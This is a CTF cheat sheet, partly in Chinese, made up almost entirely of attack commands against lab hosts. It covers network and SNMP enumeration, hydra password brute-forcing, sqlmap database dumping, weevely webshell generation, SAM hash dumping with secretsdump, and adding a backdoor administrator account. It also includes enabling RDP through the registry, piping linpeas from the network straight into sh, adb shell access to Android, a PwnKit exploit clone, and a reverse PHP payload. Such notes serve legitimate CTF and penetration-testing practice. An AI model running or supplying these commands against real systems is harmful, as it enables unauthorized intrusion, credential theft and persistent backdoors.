
CTF Memo

nmap

網路設備及服務掃描

sudo nmap 10.10.10.16  //1000 port
sudo nmap 10.10.10.16 -p-  //1-65535 port
sudo nmap 10.10.10.16 -sU -p53,139,161,1900,5353  //UDP port
sudo nmap 10.10.10.16 -p80 --reason  //REASON
sudo nmap 10.10.10.16 -p80 --open  //display only open port ip
sudo nmap 10.10.10.16 -O  //OS
sudo nmap 10.10.10.16 -sV  //VERSION
sudo nmap 10.10.10.16 -sVC -p445,3389  //VERSION + NSE
sudo nmap 10.10.10.* -sU -p161 --open  //SNMP
sudo nmap 10.10.10.16 -sU -p161 -sC  //使用 NSE 預設腳本
sudo nmap 10.10.10.16 -sU -p161 --script snmp-win32-users  //user account

snmp-check

SNMP 設備列舉

sudo snmp-check 10.10.10.16

nbtscan

NetBIOS 掃描

sudo nbtscan 10.10.10.1-254

hydra

破密工具

hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst ftp://10.10.10.16
hydra -l king -P /usr/share/wordlists/nmap.lst rdp://10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst 10.10.10.16 telnet

enum4linux

列舉Windows訊息

sudo enum4linux -u king -p 'slave' -a 10.10.10.16

crackmapexec

網域滲透工具（更新 impacket：python3 -m pip install --upgrade impacket）

sudo crackmapexec smb 10.10.10.16 -u king -p 'slave' --shares

net

net use \\10.10.10.16 slave /u:king
net view \\10.10.10.16
net user queen /add
net users
net localgroup Administrator queen /add
net localgroup Administrators

reg add

新增機碼

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netstat

網路狀態

netstat -an | findstr :3389

sqlmap

SQL 注入檢測工具

sudo sqlmap -u "https://url" --cookie="<COOKIE>" --dbs
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name --tables
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name -T Table_name --columns --technique=B
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name -T Table_name --dump --technique=B
sudo sqlmap -u "https://url" --forms --crawl=2 -dbs

weevely

Webshell

weevely generate king backdoor.php  //生成
weevely http://ip:port/backdoor.php king  //連接

wpscan

WordPress安全性掃描工具

wpscan --url http://url -e u  //列舉使用者
wpscan --url http://url -P /usr/share/wordlists/nmap.lst  //破密

pwdump

reg save hklm\sam pwdump\sam
reg save hklm\system pwdump\system
impacket-secretsdump LOCAL -system pwdump/system -sam pwdump/sam -outputfile pwdump/10.10.10.10
ophcrack (執行程式破密)

john

破密工具

john secret.txt --format=raw-md5

aircrack

aircrack-ng WEPooo.cap
aircrack-ng WPA2ooo.cap -w /usr/share/wordlists/nmap.lst

linPEAS

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Android

nmap -p5555 10.10.10.* --open
sudo apt install -y adb
adb connect 10.10.10.20:5555
adb devices
adb shell
adb pull /system/app/cindy.apk E:\Cindy\  //get file

impacket upgrade

python3 -m pip install --upgrade impacket

gzip

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

snow

snow -C -p pass -m "message" text1.txt text2.txt
snow -C -p pass text2.txt text3.txt

mount

apt install nfs-common
showmount -e 10.10.10.20
mount -t nfs 10.10.10.20:/home /mnt/nfs
mount -t cifs //10.10.10.20/C$ /mnt/smb -o username=king,password=slave

smbclient

smbclient -U "kingdom\king"  //10.10.10.20/C$

others

njRAT         //trojan
SNOW          //space
OpenStego     //picture
HashMyFiles
VeraCrypt
CrypTool
ophcrack
dir xxx.xxx /s/a/p   //find files
visudo
git clone https://github.com/ly4k/PwnKit.git    //CVE-2021-4034
https://github.com/horsicq/DIE-engine/releases  //DIE
nikto -h http://url -Tuning x -o results -F txt
https://highon.coffee/blog/nikto-cheat-sheet/
https://crackstation.net/
https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap
service rpcbind start
set PAYLOAD php/reverse_php

License

MIT
